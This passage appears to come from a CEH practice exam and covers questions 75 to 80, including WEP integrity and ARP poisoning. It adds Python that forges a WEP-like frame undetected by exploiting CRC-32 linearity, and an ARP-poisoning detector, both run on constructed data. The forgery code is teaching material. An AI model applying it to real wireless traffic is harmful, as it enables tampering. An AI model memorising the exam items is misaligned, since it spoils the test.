Vulnerability measurement and assessments for the U.S. Department of Defense, Incident response services for all Internet providers, and Pen test registration for public and private sector are incorrect.
These answers do not reflect CSIRT.
Question 75 of 80
75. Question
You are performing penetration testing with your team and successfully gain access to a machine. You discover a hidden folder on the system that has an individual’s bank account password and user ID stored in plain text. Which of the following should you do?
Correct
Correct answer:
Continue testing is correct.
CEH and real-life circumstance often don’t line up. Your agreement documentation should be iron clad and cover what your actions should be in any given event. Outside of any specific direction provided, in this circumstance you should just continue testing. Your team does not know what is on these systems or why it is stored there, and any other action may put you in legal trouble. Document, and move on.
Incorrect answers:
Report the finding to the systems administrator immediately, Store the file elsewhere and delete it from the machine, and Use the credentials to log in to the bank account and leverage attacks into that system are incorrect.
Unless specifically directed, discovery of any particular finding is not cause to stop and report findings immediately.
The remaining answers are unethical.
Question 76 of 80
76. Question
Which of the following is true regarding ESP in Tunnel Mode?
Correct
Correct Answer:
It encrypts the entire packet is correct. In Tunnel Mode, ESP encrypts the original IP packet in full (header and payload) and wraps it in a new outer IP header, which is exactly what a gateway-to-gateway tunnel across the Internet needs.
Incorrect Answers:
It encrypts only the payload, It encrypts the header only, and It provides authentication and integrity for the entire packet are incorrect.
Encrypting only the payload describes ESP in Transport Mode, and no IPsec mode encrypts only the header.
ESP's optional integrity check covers the ESP header, the encrypted data, and the ESP trailer, but not the outer IP header. Integrity and authentication for the entire packet, IP header included, is the job of the Authentication Header (AH), which can be used in either Transport or Tunnel Mode.
Question 77 of 80
77. Question
Malware developers do their best to hide their work. Which of the following best describes crypters?
Correct
Correct answer:
Software tools that use a combination of encryption and code manipulation to render malware as undetectable to antivirus products is correct.
Crypters are software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products (in Internet lingo, such a sample is "FUD," for "fully undetectable").
Incorrect answers:
"Packers" are related evasion tools that compress the malware executable into a smaller, obfuscated form that is unpacked in memory at run time; they hinder static analysis but are not defined by encryption.
Trojans look innocent but turn evil after installation.
Steganography tools hide data in existing image, video, or audio files.
Question 78 of 80
78. Question
In WEP, data integrity is provided by a 32-bit integrity check value (ICV) that is appended to the 802.11 payload and encrypted. However, this could be changed by an attacker without being detected by the recipient. What does WPA use as an improved integrity measure?
Correct
Correct Answer:
MIC is correct.
Message integrity check (MIC, also known as Michael) is the integrity feature of WPA/TKIP. WEP's ICV is a CRC-32, which is linear: an attacker who flips bits in the encrypted payload can compute the matching change to the encrypted ICV without knowing the key, so the receiver's check still passes and the tampering goes unnoticed. Michael is a keyed 8-byte MIC computed over the frame and placed between the data portion and the 4-byte ICV; a forged frame fails the MIC check even when the CRC passes. TKIP also adds a per-packet sequence counter, and the access point drops packets received out of order, which defeats replay.
Incorrect Answers:
AES and RC4 are encryption algorithms.
CCMP does provide for integrity checking, but it's part of WPA2, not WPA.
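Why the CRC-32 ICV in the question can be changed without detection, shown end to end. This is an added example, not part of the original test: it builds a WEP-like frame (payload plus CRC-32 ICV, XOR-ed with a keystream that stands in for RC4), then has an attacker who never sees the key flip bytes in the cipher text and patch the encrypted ICV using only the linearity of CRC-32. The receiver decrypts and the check passes. The frame contents and the keystream are constructed.

```python
"""Why a CRC-32 integrity check value (ICV) under a stream cipher can be
altered undetected.  Added example, not part of the original test.

CRC-32 is affine over XOR: crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros) for
equal-length inputs.  A stream cipher XORs plain text with a keystream, so
flipping bits in the cipher text flips the same bits of the plain text; the
attacker can flip the matching bits of the encrypted ICV and the receiver's
check still passes.  The random keystream below stands in for RC4; only the
XOR structure matters for the attack.
"""
import os
import struct
import zlib

ICV_LEN = 4


def crc32_bytes(data: bytes) -> bytes:
    """CRC-32 as the 4 little-endian bytes WEP appends to the payload."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_like_encrypt(plain: bytes, keystream: bytes) -> bytes:
    """Sender: append the ICV, then XOR payload+ICV with the keystream."""
    body = plain + crc32_bytes(plain)
    return xor_bytes(body, keystream[: len(body)])


def wep_like_decrypt(cipher: bytes, keystream: bytes):
    """Receiver: strip the keystream, verify the ICV; returns (plain, icv_ok)."""
    body = xor_bytes(cipher, keystream[: len(cipher)])
    plain, icv = body[:-ICV_LEN], body[-ICV_LEN:]
    return plain, icv == crc32_bytes(plain)


def tamper(cipher: bytes, delta: bytes) -> bytes:
    """Attacker: XOR `delta` into the payload and fix up the ICV using only
    CRC linearity.  Neither the key nor the keystream is needed; the attacker
    only has to know which bits to flip (delta), not the whole plain text."""
    zeros = bytes(len(delta))
    # crc(p ^ delta) == crc(p) ^ crc(delta) ^ crc(zeros).  crc(p) is already
    # sitting (encrypted) at the end of the frame, so XOR in the other two.
    icv_delta = xor_bytes(crc32_bytes(delta), crc32_bytes(zeros))
    return xor_bytes(cipher, delta + icv_delta)


def demo():
    """Encrypt a constructed frame, forge it blind, and let the receiver check it."""
    keystream = os.urandom(64)                 # unknown to the attacker
    plain = b"PAY 0010 USD TO BOB"             # constructed payload
    frame = wep_like_encrypt(plain, keystream)
    wanted = b"PAY 9910 USD TO BOB"            # attacker's target text
    delta = xor_bytes(plain, wanted)           # bits to flip (same length)
    forged = tamper(frame, delta)
    return wep_like_decrypt(forged, keystream)


if __name__ == "__main__":
    print(demo())
```

A keyed MIC such as Michael breaks this because its value depends on a secret the attacker does not hold and is not linear in the message, so no fix-up for a chosen `delta` can be computed from the frame alone.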
Question 79 of 80
79. Question
Which cloud service type is designed to offer on-demand applications to subscribers over the Internet?
Correct
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 80 of 80
80. Question
Which of the following best describes ARP poisoning?
Correct
Correct Answer:
In ARP poisoning, an attacker continually inserts invalid entries into an ARP cache is correct.
In ARP poisoning, the attacker keeps injecting a bad IP-to-MAC mapping, typically with unsolicited ARP replies that most stacks accept without checking, so that traffic intended for the target goes to the attacker instead. The injection has to be repeated because cache entries expire and the legitimate host keeps reasserting its own address.
Incorrect answers:
In ARP poisoning, an attacker floods a switch with thousands of ARP packets, In ARP poisoning, an attacker uses ARP to insert bad IP mappings into a DNS server, and In ARP poisoning, an attacker continually deletes an ARP cache are incorrect.
None of the remaining answers correctly describes ARP poisoning. Yes, it’s true an attacker may be sending thousands of ARP packets through a switch to the target, but that in and of itself does not ARP poisoning make.
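Detection logic for the pattern just described, run over a constructed list of ARP replies. This is an added example, not code from the original test: the `ArpReply` record, the sample traffic (a host with MAC `de:ad:be:ef:00:01` repeatedly claiming to be both the gateway and a victim) and the `detect_poisoning` function are invented here. It flags two things a defender cares about: an IP whose MAC changes from what was previously seen or pinned, and a single MAC that claims several IPs, which is what spoofing both ends of a conversation looks like on the wire.

```python
"""Detecting ARP cache poisoning from repeated replies that re-assert a
changed IP-to-MAC mapping.  Added example, not part of the original test.

Input is a constructed list of ARP replies (what a sniffer on the segment
would see); no live capture is involved.  The detector learns the first
mapping for each IP (or takes pinned mappings), flags any reply that
contradicts it, and separately flags one MAC claiming several IPs.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since capture start
    sender_ip: str
    sender_mac: str


# Constructed traffic: the gateway is 10.0.0.1 / aa:..:01.  From t=5 a host
# with MAC de:ad:be:ef:00:01 repeatedly claims to be the gateway AND the
# victim 10.0.0.7, which is the classic man-in-the-middle poisoning pattern.
SAMPLE = [
    ArpReply(0.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    ArpReply(1.0, "10.0.0.7", "bb:bb:bb:bb:bb:07"),
    ArpReply(2.0, "10.0.0.9", "cc:cc:cc:cc:cc:09"),
    ArpReply(5.0, "10.0.0.1", "de:ad:be:ef:00:01"),
    ArpReply(5.1, "10.0.0.7", "de:ad:be:ef:00:01"),
    ArpReply(7.0, "10.0.0.1", "de:ad:be:ef:00:01"),
    ArpReply(7.1, "10.0.0.7", "de:ad:be:ef:00:01"),
]


def detect_poisoning(replies, trusted=None):
    """Return a list of alert strings for suspicious ARP replies.

    trusted: optional dict of pinned IP -> MAC (e.g. the gateway).  Without
    it the first mapping seen is trusted, which a poisoner already present
    at capture start could exploit, so pin critical hosts in production.
    """
    table = dict(trusted or {})
    ips_by_mac = defaultdict(set)
    alerts = []
    for r in replies:
        ips_by_mac[r.sender_mac].add(r.sender_ip)
        known = table.get(r.sender_ip)
        if known is None:
            table[r.sender_ip] = r.sender_mac       # learn on first sight
        elif known != r.sender_mac:
            alerts.append(
                f"t={r.ts:.1f}: {r.sender_ip} changed from {known} "
                f"to {r.sender_mac} (possible ARP poisoning)"
            )
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(
                f"{mac} claims {len(ips)} addresses: {sorted(ips)} "
                f"(one host impersonating several)"
            )
    return alerts


if __name__ == "__main__":
    for line in detect_poisoning(SAMPLE, trusted={"10.0.0.1": "aa:aa:aa:aa:aa:01"}):
        print(line)
```

On switches the same mappings can be enforced rather than merely observed: Dynamic ARP Inspection validates replies against the DHCP snooping binding table and drops the spoofed ones, which removes the window in which the detector above would only be reporting.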